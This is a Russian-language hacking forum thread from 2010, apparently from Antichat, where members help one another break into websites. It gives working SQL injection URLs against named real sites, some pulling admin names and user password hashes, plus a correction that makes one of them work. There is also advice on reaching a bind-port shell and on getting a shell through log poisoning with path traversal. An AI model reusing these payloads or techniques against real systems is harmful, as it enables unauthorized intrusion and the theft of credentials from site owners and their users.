03.02.2010, 22:24
|
|
Участник форума
Регистрация: 15.01.2009
Сообщений: 158
С нами:
9116253
Репутация:
26
|
|
Не могу больше ничего получить, не хватает думалки:
Код:
http://www.3g-peoplenet.com.ua/news/news_view.php?news_id=-9+union+select+1,concat_ws(0x3a,version(),user()),3,4,5,6,7,8,9,10,11,12+from+information_schema.tables--
Что из этого можно вытянуть?
77-log:3g-administrator@localhost |
|
|
03.02.2010, 23:03
|
|
Участник форума
Регистрация: 10.06.2008
Сообщений: 201
С нами:
9431076
Репутация:
229
|
|
а там ничего толкового не получишь...
Код:
http://www.3g-peoplenet.com.ua/news/news_view.php?news_id=-9+union+select+1,2,3,4,5,6,7,concat_ws%280x3a,admin_id,admin_name%29,9,10,11,12+from+admin--
колонки с пассами нет(( |
|
|
|
04.02.2010, 19:37
|
|
Участник форума
Регистрация: 24.08.2009
Сообщений: 172
С нами:
8797559
Репутация:
-16
|
|
все зделаю и ок..а в конце не полуцается..
а зацем ??
http://www.kane.dk/index.php?menuID=2&pageID=-2+union+select+0,1,group_concat(char(60,98,114,62) ,0x3a,g_id,0x3a,g_userName,0x3a,g_hashedPassword), 3+from+g2_User
|
|
|
|
04.02.2010, 19:40
|
|
Постоянный
Регистрация: 11.10.2007
Сообщений: 406
С нами:
9780227
Репутация:
1423
|
|
Таблица в другой базе данных
http://www.kane.dk/index.php?menuID=2&pageID=-2+union+select+0,1,group_concat(char(60,98,114,62) ,0x3a,g_id,0x3a,g_userName,0x3a,g_hashedPassword), 3+from+usr_web0_2.g2_User
|
|
|
|
04.02.2010, 19:58
|
|
Участник форума
Регистрация: 24.08.2009
Сообщений: 172
С нами:
8797559
Репутация:
-16
|
|
spasibo ElteRUS
|
|
|
|
05.02.2010, 10:06
|
|
Познающий
Регистрация: 11.09.2008
Сообщений: 94
С нами:
9296460
Репутация:
19
|
|
делаю бинд порт на freebsd,проверяю
Код:
tcp 0 0 0.0.0.0:37695 0.0.0.0:* LISTEN
порт открылся,пробую приконектится
Код:
nc
Cmd line: xx.xx.xx.xx 37695
(UNKNOWN) [xx.xx.xx.xx] 37695 (?) : Connection timed out
в чем может быть проблема ? |
|
|
|
05.02.2010, 10:09
|
|
Members of Antichat - Level 5
Регистрация: 02.11.2006
Сообщений: 781
С нами:
10274726
Репутация:
1917
|
|
в фаерволе
__________________
Карфаген должен быть разрушен...
|
|
|
|
05.02.2010, 15:14
|
|
Участник форума
Регистрация: 11.10.2009
Сообщений: 116
С нами:
8728261
Репутация:
211
|
|
всем привет!
у меня такой вопрос...
ктонибудь пробовал заливать шелл,или хотябы выполнять какието команды через:
../../../../../../proc/self/fd/2 -я знаю што это логи апача, но там внутри содержание больше напоминает пхп сессии.
|
|
|
|
05.02.2010, 15:17
|
|
Участник форума
Регистрация: 25.04.2007
Сообщений: 176
С нами:
10024314
Репутация:
739
|
|
Это не логи а список процессов вроде,там нужно юзер агент подменять.
|
|
|
|
05.02.2010, 16:05
|
|
Участник форума
Регистрация: 11.10.2009
Сообщений: 116
С нами:
8728261
Репутация:
211
|
|
Сообщение от ILYAtirtir
Это не логи а список процессов вроде,там нужно юзер агент подменять.
а помойму это эррор_лог апачевский...
|
|
|
|
|
 |
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Комбинированный вид
